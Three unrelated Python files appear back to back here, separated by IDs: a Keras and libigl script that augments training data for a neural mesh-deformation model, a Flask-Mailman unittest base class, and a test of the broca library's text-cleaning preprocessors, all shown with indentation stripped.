import pyigl as igl
from utils.iglhelpers import e2p, p2e
from utils import my_utils
current_frame = 0
def sample_more_encoded_displacements(encoded_displacements, num_extra_per_pose=10):
max_diff = numpy.zeros(encoded_displacements.shape[1])
for i in range(len(encoded_displacements) - 1):
abs_diff = numpy.abs(encoded_displacements[i] - encoded_displacements[i+1])
max_diff = numpy.max(numpy.stack((abs_diff, max_diff)), 0)
mu = 0
sigma = max(max_diff / 6.0) # Just take max scaled by a factor for now
extra_encoded_displacements = numpy.repeat(encoded_displacements, num_extra_per_pose, axis=0)
extra_encoded_displacements += numpy.random.normal(mu, sigma, extra_encoded_displacements.shape)
# print(extra_encoded_displacements[:len(encoded_displacements)] - encoded_displacements)
return extra_encoded_displacements
def save_mat_with_prefix(path, prefix, mat):
dmat_path = os.path.join(path, '%s.dmat' % (prefix))
my_utils.save_numpy_mat_to_dmat(dmat_path, mat)
return dmat_path
def reencode_and_augment_training_data(model_root, num_extra_per_poses=0):
"""
    Loads existing training data and generates new encoding / energy vector pairs for
    1. Energy evaluated on decoded displacements of training data.
2. Energy evaluated on poses sampled around the encoded training poses.
"""
training_data_path = os.path.join(model_root,'training_data/training')
U = igl.eigen.MatrixXd()
igl.readDMAT(os.path.join(model_root, 'pca_results/ae_pca_components.dmat'), U)
displacements = my_utils.load_displacement_dmats_to_numpy(training_data_path)
flatten_displ, unflatten_displ = my_utils.get_flattners(displacements)
from keras.models import Model, load_model
encoder = load_model(os.path.join(model_root,'keras_models/encoder.hdf5'))
decoder = load_model(os.path.join(model_root,'keras_models/decoder.hdf5'))
encoded_displacements = encoder.predict(flatten_displ(displacements) @ U)
decoded_displacements = decoder.predict(encoded_displacements) @ U.transpose()
print('Generating extra samples...')
extra_encoded_displacements = sample_more_encoded_displacements(encoded_displacements, num_extra_per_poses)
extra_decoded_displacements = decoder.predict(extra_encoded_displacements) @ U.transpose()
sampled_training_data_path = os.path.join(model_root, 'augmented_training_data/sampled/')
reencoded_training_data_path = os.path.join(model_root, 'augmented_training_data/reencoded/')
my_utils.create_dir_if_not_exist(sampled_training_data_path)
my_utils.create_dir_if_not_exist(reencoded_training_data_path)
extra_displacements_path = save_mat_with_prefix(sampled_training_data_path, 'displacements', extra_decoded_displacements)
save_mat_with_prefix(sampled_training_data_path, 'enc_displacements', extra_encoded_displacements)
reencoded_displacements_path = save_mat_with_prefix(reencoded_training_data_path, 'displacements', decoded_displacements)
save_mat_with_prefix(reencoded_training_data_path, 'enc_displacements', encoded_displacements)
tet_mesh_path = os.path.join(model_root, 'tets.mesh')
parameters_path = os.path.join(model_root, 'training_data/training/parameters.json')
print('Computing energies for reencoded poses...')
subprocess.call(['./generate_data_for_pose/build/bin/GenerateDataForPose', reencoded_displacements_path, tet_mesh_path, parameters_path])
print('Computing energies for samples...')
subprocess.call(['./generate_data_for_pose/build/bin/GenerateDataForPose', extra_displacements_path, tet_mesh_path, parameters_path])
## TODO
# Save them all as one matrix.. It's more efficient that way
# Now I just have to get the energies and I can plop this into my pipeline
# scale = numpy.max(energies)
# print(numpy.apply_along_axis(numpy.linalg.norm, 1, energies).shape)
# print("scale: ", scale)
# # energies = energies.reshape((len(energies), len(energies[0]))) / scale
# # energies_test = energies_test.reshape((len(energies_test), len(energies_test[0]))) / scale
# energies = energies / numpy.apply_along_axis(numpy.linalg.norm, 1, energies)[:, None]
# # energies_test = energies_test / scale
# # print(energies)
# # energies = numpy.sum(energies,axis=1)
# # print(energies)
# # energies_test = numpy.sum(energies_test,axis=1)
# flatten_data, unflatten_data = my_utils.get_flattners(energies)
# Set up drawings
# np_verts, np_faces = my_utils.load_base_vert_and_face_dmat_to_numpy(training_data_path)
# viewer = igl.viewer.Viewer()
# viewer.data.set_mesh(p2e(np_verts), p2e(np_faces))
# def pre_draw(viewer):
# global current_frame
# if viewer.core.is_animating:
# idx = current_frame % len(extra_decoded_displacements)
# verts = extra_decoded_displacements[current_frame].reshape(np_verts.shape) + np_verts
# viewer.data.set_vertices(p2e(verts))
# viewer.data.compute_normals()
# current_frame += 1
# return False
# viewer.callback_pre_draw = pre_draw
# # viewer.callback_key_down = key_down
# viewer.core.is_animating = False
# # viewer.core.camera_zoom = 2.5
# viewer.core.animation_max_fps = 3
# viewer.launch()
if __name__ == '__main__':
model_root = sys.argv[1]
reencode_and_augment_training_data(model_root)
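# Example invocation (the script name and model path are illustrative; the model
# directory is assumed to contain training_data/, pca_results/ and keras_models/
# as used above):
#
#     python reencode_and_augment.py ./models/example_model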
|
1710140
|
import unittest
from contextlib import contextmanager
import pytest
from flask import Flask
from flask_mailman import Mail
class TestCase(unittest.TestCase):
TESTING = True
MAIL_DEFAULT_SENDER = "<EMAIL>"
def setUp(self):
self.app = Flask(__name__)
self.app.config.from_object(self)
self.assertTrue(self.app.testing)
self.mail = Mail(self.app)
self.ctx = self.app.test_request_context()
self.ctx.push()
def tearDown(self):
self.ctx.pop()
@contextmanager
def mail_config(self, **settings):
"""
Context manager to alter mail config during a test and restore it after,
even in case of a failure.
"""
original = {}
state = self.mail.state
for key in settings:
assert hasattr(state, key)
original[key] = getattr(state, key)
setattr(state, key, settings[key])
yield
# restore
for k, v in original.items():
setattr(state, k, v)
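# Example use of mail_config in a test method (a sketch; `default_sender` is assumed
# to be one of the attributes exposed on the extension state, which the hasattr
# assertion above guards against misspelling):
#
#     def test_overridden_sender(self):
#         with self.mail_config(default_sender="other@example.com"):
#             ...  # send a message and assert on its from address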
def assertIn(self, member, container, msg=None):
if hasattr(unittest.TestCase, 'assertIn'):
return unittest.TestCase.assertIn(self, member, container, msg)
return self.assertTrue(member in container)
def assertNotIn(self, member, container, msg=None):
if hasattr(unittest.TestCase, 'assertNotIn'):
return unittest.TestCase.assertNotIn(self, member, container, msg)
return self.assertFalse(member in container)
def assertIsNone(self, obj, msg=None):
if hasattr(unittest.TestCase, 'assertIsNone'):
return unittest.TestCase.assertIsNone(self, obj, msg)
return self.assertTrue(obj is None)
def assertIsNotNone(self, obj, msg=None):
if hasattr(unittest.TestCase, 'assertIsNotNone'):
return unittest.TestCase.assertIsNotNone(self, obj, msg)
return self.assertTrue(obj is not None)
@pytest.fixture(autouse=True)
def capsys(self, capsys):
self.capsys = capsys
|
1710148
|
import unittest
from broca.preprocess import BasicCleaner, HTMLCleaner
class PreProcessTests(unittest.TestCase):
def test_clean(self):
doc = '''
Goats are like mushrooms. If you shoot a duck, I'm scared of toasters. My site's are https://google.com.
'''
expected_doc = '''
goats are like mushrooms if you shoot a duck im scared of toasters my site are
'''
doc = BasicCleaner().preprocess([doc])[0]
self.assertEqual(doc, expected_doc.strip())
def test_html_clean(self):
doc = '''
<html>goats are like <b>mushrooms</b> if you shoot a duck <em>im scared of toasters</em> my site are<div></div></html>
'''
expected_doc = '''
goats are like mushrooms if you shoot a duck im scared of toasters my site are
'''
doc = HTMLCleaner().preprocess([doc])[0]
self.assertEqual(doc, expected_doc.strip())
|